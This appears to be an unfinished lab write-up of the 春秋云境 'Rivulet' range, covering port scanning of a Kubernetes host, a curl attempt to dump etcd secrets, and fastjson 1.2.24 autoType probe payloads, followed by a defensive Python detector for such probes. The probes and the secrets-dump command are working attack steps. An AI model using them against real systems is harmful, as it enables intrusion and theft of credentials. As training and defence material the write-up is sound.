Contents

  1. Preface
  2. External network
    2.1. Information gathering


春秋云境 Rivulet (unfinished)

2026/4/24  Penetration testing  春秋云境

Preface

Topics: privilege escalation through vulnerabilities, privileged containers, information disclosure, domain penetration

Reference: https://mp.weixin.qq.com/s/Alz-DFfAbJUQWNm1qmsNgQ


External network

Information gathering

[-] start ping
 {icmp} 121.89.86.15    up
[*] live Hosts num: 1
 121.89.86.15: [22 2379 2380 6443 8080 10250 10251 10252]
[*] alive ports len is: 8
[*] start vulscan
[*] WebTitle http://121.89.86.15:10251 code:404 len:19     title:None
[*] WebTitle http://121.89.86.15:10252 code:404 len:19     title:None
[*] WebTitle https://121.89.86.15:10250 code:200 len:104    title:None
[*] WebTitle https://121.89.86.15:6443 code:403 len:233    title:None
已完成 0/8 [-] webtitle https://121.89.86.15:2379 Get "https://121.89.86.15:2379": remote error: tls: bad certificate 
已完成 1/8 [-] webtitle https://121.89.86.15:2380 Get "https://121.89.86.15:2380": remote error: tls: bad certificate 
[*] WebTitle http://121.89.86.15:8080  code:302 len:0      title:None 跳转url: http://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A
[*] WebTitle http://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A code:400 len:277    title:None
已完成 2/8 [-] webtitle https://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A Get "https://121.89.86.15:8080/login;jsessionid=10D577817821DAF086B62F031E19765A": http: server gave HTTP response to HTTPS client

First try the k8s components

curl -k https://121.89.86.15:2379/v2/keys/registry/secrets/default\?recursive\=true
curl: (35) LibreSSL/3.3.6: error:1401E412:SSL routines:CONNECT_CR_FINISHED:sslv3 alert bad certificate

❯ curl -k https://121.89.86.15:10250/pods
<h1>403 Forbidden</h1>
Access denied by nginx whitelist.
<br>
Please access via the correct IP address.

Port 2379 (etcd) requires a client certificate, and port 10250 (kubelet) is behind an nginx IP allowlist, so neither is usable from here.

The web service on 8080 can be entered directly without any credentials; once inside there is this text:

Hello User - Admin

Welcome to the "My" forum. We hope you can find the knowledge and assistance you need here.
flaghunt2 - admin

hello_json_file

Inside is a create-post function; capturing the request shows it submits JSON. A successful creation returns 302, a failure returns 500.

Probing for fastjson

Testing with dnslog

{
  "content":{"@type":"java.net.Inet4Address","val":"dnslog.com"}
}

The posts endpoint returns dnslog.com/13.223.25.84, but nothing arrives on the dnslog side, which means the host has no outbound network access.

{
  "title": {"@type": "com.sun.rowset.JdbcRowSetImpl"}
}

The posts endpoint returns com.sun.rowset.JdbcRowSetImpl@64afa2de, which indicates the fastjson version is 1.2.24.

Probing for classes

{
  "title": {
    "@type": "java.lang.Character"{
  "@type": "java.lang.Class",
  "val": "org.apache.tomcat.dbcp.dbcp.BasicDataSource"
}}

A 500 response means the class is present; test results:

org.apache.catalina.startup.Tomcat
org.springframework.web.bind.annotation.RequestMapping
com.sun.org.apache.bcel.internal.util.ClassLoader
com.sun.rowset.JdbcRowSetImpl

Only bcel and jdbc (JdbcRowSetImpl) are present, but the bcel chain cannot be used because the org.apache.tomcat package is missing.
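From the defender's side, the probes above leave a clear trace in request bodies: an `@type` key, and in the class-existence case a body that is not even valid JSON. The following Python check is an added example, not code from the original post or the range; the sample bodies are constructed from the payloads shown on this page, and the PROBE_CLASSES set is an assumed starting list rather than a complete one.

```python
import json
import re

# Classes used by the probes on this page; any other @type value is still flagged.
PROBE_CLASSES = {
    "java.net.Inet4Address",          # out-of-band DNS probe
    "com.sun.rowset.JdbcRowSetImpl",  # JNDI gadget, used here for version fingerprinting
    "java.lang.Class",                # class-existence probe
    "com.sun.org.apache.bcel.internal.util.ClassLoader",
}
AT_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')


def _walk(node):
    """Yield every @type value anywhere in a parsed JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "@type" and isinstance(value, str):
                yield value
            yield from _walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item)


def find_autotype_probes(body: str) -> dict:
    """Report @type usage in one body; the java.lang.Character probe is deliberately
    invalid JSON, so on a parse failure fall back to a regex and flag it malformed."""
    try:
        classes, malformed = list(_walk(json.loads(body))), False
    except ValueError:
        classes, malformed = AT_TYPE_RE.findall(body), True
    return {"classes": classes, "malformed": malformed,
            "known_probe": any(c in PROBE_CLASSES for c in classes)}


# Constructed sample bodies: one normal post plus the three probes from this page.
SAMPLE_BODIES = [
    '{"title": "hello", "content": "just a normal post"}',
    '{"content":{"@type":"java.net.Inet4Address","val":"dnslog.com"}}',
    '{"title": {"@type": "com.sun.rowset.JdbcRowSetImpl"}}',
    '{"title": {"@type": "java.lang.Character"{"@type": "java.lang.Class",'
    '"val": "org.apache.tomcat.dbcp.dbcp.BasicDataSource"}}}',
]


def scan_bodies(bodies=SAMPLE_BODIES) -> list:
    """Return (index, result) for every body that carries an @type key."""
    return [(i, r) for i, b in enumerate(bodies)
            if (r := find_autotype_probes(b))["classes"]]
```

Pairing a hit with the 500-on-malformed-body behaviour described above gives a cheap WAF or log rule; the real fix for a 1.2.24 deployment is upgrading fastjson and keeping autoType disabled.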